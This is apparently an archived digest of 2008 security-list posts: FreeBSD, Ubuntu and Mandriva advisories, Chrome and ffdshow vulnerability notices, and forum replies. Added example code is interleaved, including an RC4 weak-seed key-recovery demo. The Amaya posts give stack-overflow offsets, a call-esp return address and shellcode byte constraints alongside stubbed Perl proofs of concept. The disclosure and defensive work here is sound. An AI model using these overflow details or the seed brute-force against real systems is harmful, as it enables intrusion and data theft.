Credits:Robert Woolley, Mark Murray, Maxim Dounin, Ruslan Ermilov
Affects:All supported versions of FreeBSD.
Corrected:  2008-11-24 17:39:39 UTC (RELENG_7, 7.1-PRERELEASE)
2008-11-24 17:39:39 UTC (RELENG_7_0, 7.0-RELEASE-p6)
2008-11-24 17:39:39 UTC (RELENG_6, 6.4-STABLE)
2008-11-24 17:39:39 UTC (RELENG_6_4, 6.4-RELEASE)
2008-11-24 17:39:39 UTC (RELENG_6_3, 6.3-RELEASE-p6)
CVE Name:   CVE-2008-5162

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit http://security.FreeBSD.org/.

I.   Background

arc4random(9) is a generic-purpose random number generator based on the
key stream generator of the RC4 cipher.  It is expected to be
cryptographically strong, and used throughout the FreeBSD kernel for a
variety of purposes, some of which rely on its cryptographic strength.
arc4random(9) is periodically reseeded with entropy from the FreeBSD
kernel's Yarrow random number generator, which gathers entropy from a
variety of sources including hardware interrupts.  During the boot
process, additional entropy is provided to the Yarrow random number
generator from userland, helping to ensure that adequate entropy is
present for cryptographic purposes.

II.  Problem Description
 
When the arc4random(9) random number generator is initialized, there may
be inadequate entropy to meet the needs of kernel systems which rely on
arc4random(9); and it may take up to 5 minutes before arc4random(9) is
reseeded with secure entropy from the Yarrow random number generator.

III. Impact

All security-related kernel subsystems that rely on a quality random
number generator are subject to a wide range of possible attacks for the
300 seconds after boot or until 64k of random data is consumed.  The list
includes:

* GEOM ELI providers with onetime keys.  When a provider is configured in
  a way so that it gets attached at the same time during boot (e.g. it
  uses the rc subsystem to initialize) it might be possible for an
  attacker to recover the encrypted data.

* GEOM shsec providers.  The GEOM shsec subsystem is used to split a shared
  secret between two providers so that it can be recovered when both of
  them are present.  This is done by writing the random sequence to one
  of providers while appending the result of the random sequence on the
  other host to the original data.  If the provider was created within the
  first 300 seconds after booting, it might be possible for an attacker
  to extract the original data with access to only one of the two providers
  between which the secret data is split.

* System processes started early after boot may receive predictable IDs.

* The 802.11 network stack uses arc4random(9) to generate initial vectors
  (IV) for WEP encryption when operating in client mode and WEP
  authentication challenges when operating in hostap mode, which may be
  insecure.

* The IPv4, IPv6 and TCP/UDP protocol implementations rely on a quality
  random number generator to produce unpredictable IP packet identifiers,
  initial TCP sequence numbers and outgoing port numbers.  During the
  first 300 seconds after booting, it may be easier for an attacker to
  execute IP session hijacking, OS fingerprinting, idle scanning, or in
  some cases DNS cache poisoning and blind TCP data injection attacks.

* The kernel RPC code uses arc4random(9) to retrieve transaction
  identifiers, which might make RPC clients vulnerable to hijacking
  attacks.

IV.  Workaround

No workaround is available for affected systems.

V.   Solution

NOTE WELL: Any GEOM shsec providers which were created or written to
during the first 300 seconds after booting should be re-created after
applying this security update.

Perform one of the following:

1) Upgrade your vulnerable system to 6-STABLE, or 7-STABLE, or to the
RELENG_7_0, or RELENG_6_3 security branch dated after the correction
date.

2) To patch your present system:

The following patches have been verified to apply to FreeBSD 6.3 and
7.0 systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 7.x]
# fetch http://security.FreeBSD.org/patches/SA-08:11/arc4random.patch
# fetch http://security.FreeBSD.org/patches/SA-08:11/arc4random.patch.asc

[FreeBSD 6.x]
# fetch http://security.FreeBSD.org/patches/SA-08:11/arc4random6x.patch
# fetch http://security.FreeBSD.org/patches/SA-08:11/arc4random6x.patch.
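The GEOM shsec item in section III is the clearest way to see why an under-seeded arc4random(9) matters. The following is an added example, not FreeBSD code and not part of the advisory: a deliberately simplified model in which the random half of a two-provider split comes from a plain RC4 key stream (the construction arc4random(9) is based on), seeded once from a tiny state space that stands in for "inadequate entropy" at boot. An attacker holding only the XORed provider enumerates the seed space, regenerates each candidate stream and recognises the right one from a known plaintext prefix. The secret, the 8-byte marker, the 12-bit seed space and the seed derivation are all constructed assumptions for the demo; FreeBSD's actual reseeding and key-scheduling details are not modelled.

```python
"""Toy model of the GEOM shsec impact in FreeBSD-SA-08:11: a two-provider
secret split whose random half comes from an RC4 key stream seeded with too
little entropy.  Added example, not FreeBSD code."""
import os
from typing import Optional, Tuple

# Constructed sample secret; the 8-byte marker stands in for a known plaintext
# such as an on-disk magic number the attacker can recognise.
KNOWN_MAGIC = b"FS-MAGIC"
SECRET = KNOWN_MAGIC + b" block 0: key material an attacker wants"

# Assumed size of the seed space when the generator was keyed with poor
# boot-time entropy (12 bits here so the demo runs in about a second).
WEAK_SEED_BITS = 12


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Plain RC4: key schedule, then n bytes of PRGA output."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def weak_seed(state: int) -> bytes:
    """Seed derived from a small counter: models 'inadequate entropy'."""
    return state.to_bytes(2, "big")


def strong_seed() -> bytes:
    """Seed from the OS CSPRNG: models the generator after a proper reseed."""
    return os.urandom(32)


def shsec_split(secret: bytes, seed: bytes) -> Tuple[bytes, bytes]:
    """Provider A receives the random sequence, provider B the secret XORed
    with that sequence, as the advisory describes."""
    rnd = rc4_keystream(seed, len(secret))
    share_a = rnd
    share_b = bytes(s ^ r for s, r in zip(secret, rnd))
    return share_a, share_b


def shsec_join(share_a: bytes, share_b: bytes) -> bytes:
    """Legitimate reconstruction: needs both providers."""
    return bytes(a ^ b for a, b in zip(share_a, share_b))


def attack_one_share(share_b: bytes, known_prefix: bytes,
                     seed_bits: int = WEAK_SEED_BITS) -> Optional[bytes]:
    """Attacker holding only provider B.  If the split happened while the
    generator had only 2**seed_bits possible states, regenerate every candidate
    stream and keep the one that yields the known plaintext prefix."""
    for state in range(1 << seed_bits):
        rnd = rc4_keystream(weak_seed(state), len(share_b))
        candidate = bytes(x ^ r for x, r in zip(share_b, rnd))
        if candidate.startswith(known_prefix):
            return candidate
    return None


if __name__ == "__main__":
    _, b_weak = shsec_split(SECRET, weak_seed(0x0BAD))
    print("weak seed   ->", attack_one_share(b_weak, KNOWN_MAGIC))   # SECRET
    _, b_strong = shsec_split(SECRET, strong_seed())
    print("strong seed ->", attack_one_share(b_strong, KNOWN_MAGIC))  # None
```

With the weak seed the single share is enough to recover the whole secret, which is exactly the "NOTE WELL" in section V: shares written during the low-entropy window stay recoverable after the patch and must be re-created. With a seed from a proper entropy source the same search finds nothing, because the 2^12 candidate streams no longer cover the generator's state.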

[USN-675-1] Pidgin vulnerabilities

2008-11-24 Thread Marc Deslauriers
===
Ubuntu Security Notice USN-675-1  November 24, 2008
pidgin vulnerabilities
CVE-2008-2927, CVE-2008-2955, CVE-2008-2957, CVE-2008-3532
===

A security issue affects the following Ubuntu releases:

Ubuntu 7.10
Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 7.10:
  pidgin  1:2.2.1-1ubuntu4.3

Ubuntu 8.04 LTS:
  pidgin  1:2.4.1-1ubuntu2.2

After a standard system upgrade you need to restart Pidgin to effect
the necessary changes.

Details follow:

It was discovered that Pidgin did not properly handle certain malformed
messages in the MSN protocol handler. A remote attacker could send a specially
crafted message and possibly execute arbitrary code with user privileges.
(CVE-2008-2927)

It was discovered that Pidgin did not properly handle file transfers containing
a long filename and special characters in the MSN protocol handler. A remote
attacker could send a specially crafted filename in a file transfer request
and cause Pidgin to crash, leading to a denial of service. (CVE-2008-2955)

It was discovered that Pidgin did not impose resource limitations in the UPnP
service. A remote attacker could cause Pidgin to download arbitrary files 
and cause a denial of service from memory or disk space exhaustion.
(CVE-2008-2957)

It was discovered that Pidgin did not validate SSL certificates when using a
secure connection. If a remote attacker were able to perform a
man-in-the-middle attack, this flaw could be exploited to view sensitive
information. This update alters Pidgin behaviour by asking users to confirm
the validity of a certificate upon initial login. (CVE-2008-3532)


Updated packages for Ubuntu 7.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.2.1-1ubuntu4.3.diff.gz
  Size/MD5:57978 254c333b127e6f18bf5deff2df48aace

http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.2.1-1ubuntu4.3.dsc
  Size/MD5: 1475 9e202c8cb64aa6f5b813c989caea7b93

http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.2.1.orig.tar.gz
  Size/MD5: 12868326 3de2ef29d4a62c515a223cba5d4c4671

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/finch-dev_2.2.1-1ubuntu4.3_all.deb
  Size/MD5:   143616 602c6c56f30d9f40013e41841d595edb

http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/libpurple-bin_2.2.1-1ubuntu4.3_all.deb
  Size/MD5:   123834 625e7e989d6a29d8887137b407078c90

http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/libpurple-dev_2.2.1-1ubuntu4.3_all.deb
  Size/MD5:   257634 8febe671445a717eb09809b591825416

http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin-data_2.2.1-1ubuntu4.3_all.deb
  Size/MD5:  1390894 5e360d9bd1b994a21e44bdd434004d42

http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin-dev_2.2.1-1ubuntu4.3_all.deb
  Size/MD5:   201660 6844e4107ac223deaf57d022bd84540a

http://security.ubuntu.com/ubuntu/pool/universe/p/pidgin/gaim_2.2.1-1ubuntu4.3_all.deb
  Size/MD5:   119274 7836e1d1c689528c1bd533e51b8b110b

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/finch_2.2.1-1ubuntu4.3_amd64.deb
  Size/MD5:   311318 fec706b32fe99bb814056899e85a30c2

http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/libpurple0_2.2.1-1ubuntu4.3_amd64.deb
  Size/MD5:  1566428 e57dd483c64314b78811ae83afd01ab7

http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin-dbg_2.2.1-1ubuntu4.3_amd64.deb
  Size/MD5:  4873688 6b59077f56042c373ba0a0537766f197

http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.2.1-1ubuntu4.3_amd64.deb
  Size/MD5:   646402 f9d51d9559dae7a65e1ad771338d7cd9

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/finch_2.2.1-1ubuntu4.3_i386.deb
  Size/MD5:   293002 767d3b4cea192f2f567bc4004e5c34ae

http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/libpurple0_2.2.1-1ubuntu4.3_i386.deb
  Size/MD5:  1454484 051f1fe1704333c292e089d23cf1be4c

http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin-dbg_2.2.1-1ubuntu4.3_i386.deb
  Size/MD5:  4585518 02a2bac7b6ab2be201c1b2956cbae8af

http://security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.2.1-1ubuntu4.3_i386.deb
  Size/MD5:   603628 f071b1d796ca4d7894777b7c099e00f1

  lpia architecture (Low Power Intel Architecture):

http://ports.ubuntu.com/pool/main/p/pidgin/finch_2.2.1-1ubuntu4.3_lpia.deb
  Size/MD5:   292214 f14424242e4002dc026fd32c55fd859e

http://ports.ubuntu.com/pool/main/p/pidgin/libpurple0_2.2.1-1ubuntu4.3_lpia.deb
  Size/MD5:  1432448 5db14c19c6010

Re: Re: OpenSSH security advisory: cbc.adv

2008-11-24 Thread Guillaume MULLER

Hey!

They put a condition because of "National Security". Should that mean 
that they use OpenSSH in "National Security"-sensitive applications 
(interesting ;););))?


If so, should that mean that they implicitly recognize the very good 
work done by the community?


If so, why not act politely with the community and share knowledge?

This would make the software better, so that they could still use it in 
their applications.


How can't they understand that?

Why not just share the knowledge and just ask for some time (fixed 
amount? or just "when a solution will be found") before public release 
of the details of the attacks?


Why not release the details and switch to another system if OpenSSH is 
not what they need anymore?


So one more entity that just wants to benefit from FOSS, but not 
contribute...


If I were the developers, then I would just retaliate (humorously) 
by sending them a similar (fake) contract/NDA, asking them not to use 
OpenSSH, but share National Sensitive information. In other words, just 
ask them to share THEIR knowledge without US providing our tools.


There are some times where I hate the BSD licence, because it does not 
force people to cooperate! (even if I don't think any other licence 
would help here...)


My 2 cents and sorry for the off-topic subject...

Cheers

GM

--
Guillaume MULLER
Post-Doc - Sala C2-50
Laboratório de Técnicas Inteligentes (LTI)
Depto. Eng. Computação e Sistemas Digitais (PCS)
Escola Politécnica da Universidade de São Paulo
Av. Prof. Luciano Gualberto, 158 travessa 3
05508-900 - São Paulo - SP - Brasil
Tel: +55 11 3091 5397
http://www.lti.pcs.usp.br/~guillaume


Google Chrome MetaCharacter URI Obfuscation Vulnerability

2008-11-24 Thread Aditya K Sood
Advisory: Google Chrome MetaCharacter URI Obfuscation Vulnerability.

Version Affected: All
Chrome/0.2.149.30
Chrome/0.2.149.29
Chrome/0.2.149.27

Description:
Google Chrome is vulnerable to a URI obfuscation vulnerability. An
attacker can easily perform malicious redirection by manipulating the
browser functionality. The link cannot be traversed properly in the
status address bar. This could facilitate the impersonation of
legitimate web sites in order to steal sensitive information from
unsuspecting users. A URI specified with the @ character, with or
without a NULL character, causes the vulnerability.

Proof of Concept:
http://www.secniche.org/gcuri/index.html 
http://evilfingers.com/advisory/index.php

Detection:
SecNiche confirmed this vulnerability affects Google Chrome on the
Microsoft Windows XP SP2 platform. The versions tested are:

Chrome/0.2.149.30
Chrome/0.2.149.29

Disclosure Timeline:
Disclosed: 24 November 2008
Release Date: 24 November 2008

Vendor Response:
Reported to Google.

Credit:
Aditya K Sood

Disclaimer:
The information in the advisory is believed to be accurate at the time
of publishing based on currently available information. Use of the
information constitutes acceptance for use in an AS IS condition. There
are no representations or warranties, either express or implied, by or
with respect to anything in this document, and shall not be liable for
any implied warranties of merchantability or fitness for a particular
purpose or for any indirect, special or consequential damages.
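
As an added illustration of the parsing point in the advisory above (this
is editor-added example code, not part of the advisory or of any SecNiche
material): the authority section of a URL may carry userinfo before an
'@', so the text a viewer sees at the start of the address is not the host
the browser resolves. The C functions below extract the host that will
actually be contacted, flag userinfo that itself resembles a hostname, and
detect an embedded NUL byte that makes the C-string view of a URL shorter
than the bytes actually received. The .example hostnames and the sample
buffer are constructed for the demonstration.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample: the bytes a viewer might be shown end at the NUL, but
 * the bytes after it are still present in what was received. */
static const unsigned char SAMPLE_NUL_URL[] =
    "http://www.example.com\0@attacker.example/";
#define SAMPLE_NUL_URL_LEN (sizeof SAMPLE_NUL_URL - 1)

/* Locate the authority ("user:pass@host:port") of url. Returns NULL when the
 * URL has no "scheme://"; otherwise *len receives the authority length. */
static const char *url_authority(const char *url, size_t *len)
{
    const char *p = strstr(url, "://");
    if (p == NULL)
        return NULL;
    p += 3;
    *len = strcspn(p, "/?#");   /* authority ends at path, query or fragment */
    return p;
}

/* Copy the host the browser will resolve into out (NUL-terminated).
 * Everything up to the last '@' in the authority is userinfo and is skipped.
 * Returns 0 on success, -1 if url is not "scheme://..." or out is too small. */
int url_real_host(const char *url, char *out, size_t outlen)
{
    size_t alen;
    const char *auth = url_authority(url, &alen);
    if (auth == NULL)
        return -1;

    const char *host = auth;
    for (size_t i = 0; i < alen; i++)
        if (auth[i] == '@')
            host = auth + i + 1;        /* the host starts after the last '@' */
    size_t hlen = (size_t)(auth + alen - host);

    if (hlen > 0 && host[0] == '[') {   /* bracketed IPv6 literal keeps its brackets */
        const char *rb = memchr(host, ']', hlen);
        if (rb != NULL)
            hlen = (size_t)(rb - host) + 1;
    } else {                            /* drop an optional ":port" */
        const char *colon = memchr(host, ':', hlen);
        if (colon != NULL)
            hlen = (size_t)(colon - host);
    }

    if (hlen + 1 > outlen)
        return -1;
    memcpy(out, host, hlen);
    out[hlen] = '\0';
    return 0;
}

/* Returns 1 when the userinfo part contains a '.', i.e. it reads like a
 * hostname: a cheap indicator that the URL was built to mislead a viewer. */
int url_userinfo_looks_like_host(const char *url)
{
    size_t alen;
    const char *auth = url_authority(url, &alen);
    if (auth == NULL)
        return 0;
    const char *at = NULL;
    for (size_t i = 0; i < alen; i++)
        if (auth[i] == '@')
            at = auth + i;
    if (at == NULL)
        return 0;
    return memchr(auth, '.', (size_t)(at - auth)) != NULL;
}

/* Returns 1 if a NUL byte sits inside the first len bytes of buf: any code
 * that treats buf as a C string will silently work on a shorter URL. */
int url_has_embedded_nul(const unsigned char *buf, size_t len)
{
    return memchr(buf, '\0', len) != NULL;
}

int main(void)
{
    const char *samples[] = {
        "http://www.example.com@attacker.example/login",
        "https://www.example.com:8443/path?x=1",
        "http://[2001:db8::1]:8080/",
    };
    char host[64];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        if (url_real_host(samples[i], host, sizeof host) == 0)
            printf("%-48s -> host %s%s\n", samples[i], host,
                   url_userinfo_looks_like_host(samples[i])
                       ? "  (userinfo looks like a host)" : "");
    }
    printf("embedded NUL in sample: %d\n",
           url_has_embedded_nul(SAMPLE_NUL_URL, SAMPLE_NUL_URL_LEN));
    return 0;
}
```

The two checks are what a proxy, mail gateway or link-rewriting filter
can apply before a user ever sees the address: compare the extracted host
with whatever the link text claims, and reject a URL whose byte length
disagrees with its C-string length.
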


[SVRT-05-08] Critical BoF vulnerability found in ffdshow affecting all internet browsers (SVRT-Bkis)

2008-11-24 Thread svrt

1. General Information

ffdshow is a DirectShow filter and VFW codec for many audio and video 
formats, such as DivX, Xvid and H.264. It is the most popular audio and 
video decoder on Windows. Besides a stand-alone setup package, ffdshow is 
often included in almost all codec pack software such as K-lite Codec Pack, 
XP Codec Pack, Vista Codec Package, Codec Pack All in one, etc.


In Oct 2008, SVRT-Bkis detected a serious buffer overflow vulnerability 
in ffdshow which affects all available internet browsers. Taking advantage 
of the flaw, hackers can perform remote attacks, inject viruses, steal 
sensitive information and even take control of the victim's system.


Since ffdshow is open source software (it can be found at 
http://sourceforge.net/projects/ffdshow-tryout), we have contacted the 
development team and they have patched the vulnerability in the latest 
version of ffdshow.


Details : http://security.bkis.vn/?p=277
SVRT Advisory  : SVRT-05-08
Initial vendor notification :  13-11-2008
Release Date : 24-11-2008
Update Date  : 24-11-2008
Discovered by : SVRT-Bkis
Security Rating :  Critical
Impact : Remote Code Execution
Affected Software : ffdshow  (< rev2347 20081123)

2. Technique Description

The flaw occurs when ffdshow works with a media stream (e.g. 
http://[website]/test.avi). On parsing an overly long link, ffdshow would 
encounter a buffer overflow error as the memory is not allocated and 
controlled well.


ffdshow is in fact a codec component for decoding multimedia formats so it 
must be used via some media player; the default program is Windows Media 
Player (wmp). Due to this reason, all internet browsers that support wmp 
plug-in are influenced by this vulnerability, such as Internet Explorer, 
Firefox, Opera, Chrome...


In order to exploit, hackers trick users into visiting a website containing 
malicious code. If successful, malicious code would be executed without any 
users' further interaction. Hackers can then take complete control of the 
system.


3. Solution

Given the seriousness of the vulnerability, it has been patched in the 
latest version of ffdshow by the development team of the software. Bkis 
Internetwork Security Center highly recommends that users update 
ffdshow to the latest version here: 
http://sourceforge.net/project/showfiles.php?group_id=173941&package_id=199416&release_id=439904


At the moment, there are a lot of software packages bundling ffdshow that 
haven't been updated. On account of this, users should also update 
ffdshow to the latest version in:

- K-Lite Codec Pack (latest version).
- XP Codec Pack (latest version).
- Vista Codec Package (latest version).
- Codec Pack All in one (latest version).
- Storm Codec Pack (latest version).
- And many other software Codec packages using ffdshow.

In addition, software producers that make use of ffdshow in their products 
should also update these products with the latest version of ffdshow.


4. Credits
Thanks Nguyen Anh Tai for working with SVRT-Bkis.


Bach Khoa Internetwork Security Center (BKIS)
Hanoi University of Technology (Vietnam)

Email : [EMAIL PROTECTED]
Website : www.bkav.com.vn
WebBlog : security.bkis.vn
Our PGP : http://security.bkis.vn/policy/pgp/SVRT-Bkis.gpg
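
The technique section above describes the generic defect behind this class
of bug: a stream URL is copied into memory whose size was never compared
with the input length. The C code below is an editor-added illustration,
not ffdshow code and not the vulnerable routine itself; it puts the
unbounded copy pattern beside a bounded version that rejects input which
does not fit instead of truncating it. URL_BUF_SIZE and the .example
stream names are assumed values constructed for the example, and only the
bounded path is ever executed.

```c
#include <stdio.h>
#include <string.h>

#define URL_BUF_SIZE 256   /* assumed size of a fixed on-stack URL buffer */

/* UNSAFE pattern: nothing compares the length of url with the destination,
 * so a URL of URL_BUF_SIZE bytes or more writes past buf into the saved
 * frame. Shown for contrast only; it is never called in this example. */
void open_stream_unsafe(const char *url)
{
    char buf[URL_BUF_SIZE];
    strcpy(buf, url);
    printf("opening %s\n", buf);
}

/* Bounded copy. Looks for the terminator within the first outlen bytes of
 * url (C11 memchr stops at the first match, so it never reads past it); if
 * none is found the input cannot fit and is rejected rather than truncated,
 * because a truncated URL silently names a different resource.
 * Returns 0 and fills out on success, -1 on rejection. */
int copy_url_bounded(const char *url, char *out, size_t outlen)
{
    if (outlen == 0)
        return -1;
    const char *nul = memchr(url, '\0', outlen);
    if (nul == NULL)
        return -1;
    size_t n = (size_t)(nul - url);
    memcpy(out, url, n + 1);           /* n + 1 <= outlen holds here */
    return 0;
}

/* Same entry point as the unsafe version, but the length check happens
 * before any copy. Returns 0 when the stream URL was accepted, -1 when it
 * was rejected. */
int open_stream_safe(const char *url)
{
    char buf[URL_BUF_SIZE];
    if (copy_url_bounded(url, buf, sizeof buf) != 0) {
        fprintf(stderr, "rejected: stream URL exceeds %d bytes\n",
                URL_BUF_SIZE - 1);
        return -1;
    }
    printf("opening %s\n", buf);
    return 0;
}

/* Builds a constructed "http://AAAA..." test URL of exactly len bytes into
 * dst (dst must hold len + 1 bytes). Returns len. */
size_t make_long_url(char *dst, size_t len)
{
    static const char prefix[] = "http://";
    size_t i = 0;
    for (; i < len && prefix[i] != '\0'; i++)
        dst[i] = prefix[i];
    for (; i < len; i++)
        dst[i] = 'A';
    dst[len] = '\0';
    return len;
}

int main(void)
{
    char url[URL_BUF_SIZE + 64];
    open_stream_safe("http://media.example/test.avi");
    make_long_url(url, sizeof url - 1);
    open_stream_safe(url);             /* rejected instead of overrunning buf */
    return 0;
}
```

Note what the bounded version deliberately does not do: strncpy-style
truncation would keep the program alive but hand the decoder a URL the
user never asked for, so an over-long input is treated as an error and
logged.
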
 







Amaya (id) Remote Stack Overflow Vulnerability

2008-11-24 Thread writ3r
#W3C Amaya 10.1 Web Browser
#
# Amaya (id) Remote Stack Overflow Vulnerability
#
# Written and discovered by: 
# r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au)
#
# Advisory: http://www.bmgsec.com.au/advisory/41/
# --
#
# Shellcode notes: 
# The application fails to correctly process certain bytes: 
# 0x9c becomes 0x9cc2
# Similar events occur with different bytes (0xf8, 0xfb, 0xbe, 0x93, 0xab, 0xaf, 0xeb). 
#
# After reviewing the source code, the below function modifies the
# shellcode:  
# Line 902: int TtaWCToMBstring (wchar_t src, unsigned char **dest)
#
# The max value which can be used is 0x1f <-- Thanks Luigi!
# --
#
# The "id" variable of a tag contains a buffer overflow: 
# r0ut3r
#
# The application will not overflow with normal alphanumeric characters. 
# To fill the buffer I had to use "A/" repeated 91 times. Therefore buffer length is: 
# 91 * 2 = 182 + 4
#
# [junk] + [eip] + [shellcode]
#  182   +   4   +  sizeof(shellcode)
#
# ESP points to data after EIP. 
#
# "id" variable Proof of concept: 
#!/usr/bin/perl

use warnings;
use strict;

my $shellcode = 'C' x 350;

# 0x7D035F53 -> \x53\x5f\x03\x7d <-- Bingo! (call esp)
my $data   =   'test';
print $data;


Amaya (URL Bar) Remote Stack Overflow Vulnerability

2008-11-24 Thread writ3r
#W3C Amaya 10.1 Web Browser
#
# Amaya (URL Bar) Remote Stack Overflow Vulnerability
#
# Written and discovered by: 
# r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au)
#
# Advisory: http://www.bmgsec.com.au/advisory/40/
# --
#
# Shellcode notes: 
# The application fails to correctly process certain bytes: 
# 0x9c becomes 0x9cc2
# Similar events occur with different bytes (0xf8, 0xfb, 0xbe, 0x93, 0xab, 0xaf, 0xeb). 
#
# After reviewing the source code, the below function modifies the
# shellcode:  
# Line 902: int TtaWCToMBstring (wchar_t src, unsigned char **dest)
#
# The max value which can be used is 0x1f <-- Thanks Luigi!
# --
# 
# The URL bar contains a buffer overflow vulnerability: 
# buffer length: 1600 bytes
#
# [junk] + [eip] + [shellcode]
#  1600  +   4   +  sizeof(shellcode)
#
# ESP points to data after EIP. 
#
# I found it difficult to access the URL bar via HTML code. For example,
# compile the above code, write it to a HTML file, then load it into the
# browser. Attempt to click the link and you will notice there is an 800
# character limit on the link.
#
# To bypass this problem click the link then select "Links" >> "Create or
# change link...". Now click "Confirm". Alternatively just copy the payload
# into the URL bar.
#
# URL Bar Proof of concept: 
# 
#!/usr/bin/perl

use warnings;
use strict;

my $shellcode = 'C' x 80;

# 0x7D035F53 -> \x53\x5f\x03\x7d <-- Bingo! (call esp)
my $data   =   'r0ut3r';
print $data;


Re: Re: MS Internet Explorer 7 Denial Of Service Exploit

2008-11-24 Thread Glynn Clements

[EMAIL PROTECTED] wrote:

> On Konqueror 3.5.9, what happens is that this childish code builds a
> huge string, eats memory, causes swapping, and finally blows away
> Konq. Linux and X and everything else stay up and recover nicely. 
> (Gentoo/AMD64X2/3G mem)
> 
> This isn't an exploit -- at least not on Linux -- it's just kiddie
> stupidity. It doesn't take any particular cleverness to blow memory by
> dynamically creating bigger and bigger data structures. With virtual
> memory and 64-bit pointers, when exactly do we return -ENOMEM?

When RLIMIT_AS has been exceeded.

If you disable the use of mmap'd-malloc() via mallopt(M_MMAP_MAX, 0),
you can effectively limit malloc() via RLIMIT_DATA.

If you really want to allow a single process to use all available RAM
for itself, you can; but you don't have to.

It might be nice if the browser limited the amount of memory which
could be used by e.g. JavaScript (although for Firefox, you would
probably want the limit to only be applied to "external" JavaScript,
given that much of the browser itself is written in JavaScript).

-- 
Glynn Clements <[EMAIL PROTECTED]>
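
The reply above makes a concrete defensive point: a process can be told
in advance how much address space it may take, and malloc() then fails
with ENOMEM instead of the machine swapping itself to death. The C probe
below is an editor-added example, not code from Glynn or from any browser
project; it forks a child, lowers the child's RLIMIT_AS with setrlimit(),
and reports whether a malloc() of a given size still succeeds there, so
the caller's own limits are untouched. Linux is assumed (RLIMIT_AS is not
enforced on every Unix), and the 256 MiB / 1 GiB / 1 MiB sizes are values
chosen for the demonstration.

```c
#define _GNU_SOURCE                 /* fork, setrlimit, RLIMIT_AS on glibc */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/resource.h>
#include <sys/wait.h>

/* Probe whether a malloc() of request_bytes succeeds in a process whose
 * address-space limit (RLIMIT_AS) has been lowered to limit_bytes. The work
 * is done in a forked child so the caller keeps its own limits.
 * Returns 1 if the child obtained and touched the memory, 0 if it did not
 * (malloc() returned NULL, or the child died trying), -1 if the probe itself
 * could not run (fork, setrlimit or waitpid failed). */
int probe_alloc_under_limit(size_t limit_bytes, size_t request_bytes)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;

    if (pid == 0) {
        /* lower both soft and hard limit; a child may always lower them */
        struct rlimit rl = { .rlim_cur = limit_bytes, .rlim_max = limit_bytes };
        if (setrlimit(RLIMIT_AS, &rl) != 0)
            _exit(2);
        char *p = malloc(request_bytes);
        if (p == NULL)
            _exit(1);                   /* ENOMEM: the limit did its job */
        memset(p, 0xAA, request_bytes); /* touch it: success is not a mere reservation */
        free(p);
        _exit(0);
    }

    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    if (!WIFEXITED(status))
        return 0;                       /* killed by a signal: no memory delivered */
    switch (WEXITSTATUS(status)) {
    case 0:  return 1;
    case 1:  return 0;
    default: return -1;
    }
}

int main(void)
{
    size_t limit = (size_t)256 << 20;   /* 256 MiB of address space */
    size_t big   = (size_t)1 << 30;     /* 1 GiB request: must be refused */
    size_t small = (size_t)1 << 20;     /* 1 MiB request: fits comfortably */

    printf("1 GiB under a 256 MiB limit: %s\n",
           probe_alloc_under_limit(limit, big) == 0 ? "refused (ENOMEM)" : "granted");
    printf("1 MiB under a 256 MiB limit: %s\n",
           probe_alloc_under_limit(limit, small) == 1 ? "granted" : "refused");
    return 0;
}
```

The same effect is available without any code change through the shell
(`ulimit -v`, which sets RLIMIT_AS) before launching a browser. Glynn's
alternative, mallopt(M_MMAP_MAX, 0) plus RLIMIT_DATA, routes every
allocation through the brk heap so that RLIMIT_DATA bounds it; the probe
here sticks to RLIMIT_AS because it covers mmap-backed allocations as
well.
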


[ MDVSA-2008:235 ] mozilla-thunderbird

2008-11-24 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2008:235
 http://www.mandriva.com/security/
 ___

 Package : mozilla-thunderbird
 Date: November 20, 2008
 Affected: 2008.1, 2009.0, Corporate 3.0
 ___

 Problem Description:

 A number of security vulnerabilities have been discovered and
 corrected in the latest Mozilla Thunderbird program, version 2.0.0.18
 (CVE-2008-5012, CVE-2008-5014, CVE-2008-5016, CVE-2008-5017,
 CVE-2008-5018, CVE-2008-5021, CVE-2008-5022, CVE-2008-5024,
 CVE-2008-5052).
 
 This update provides the latest Thunderbird to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5012
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5014
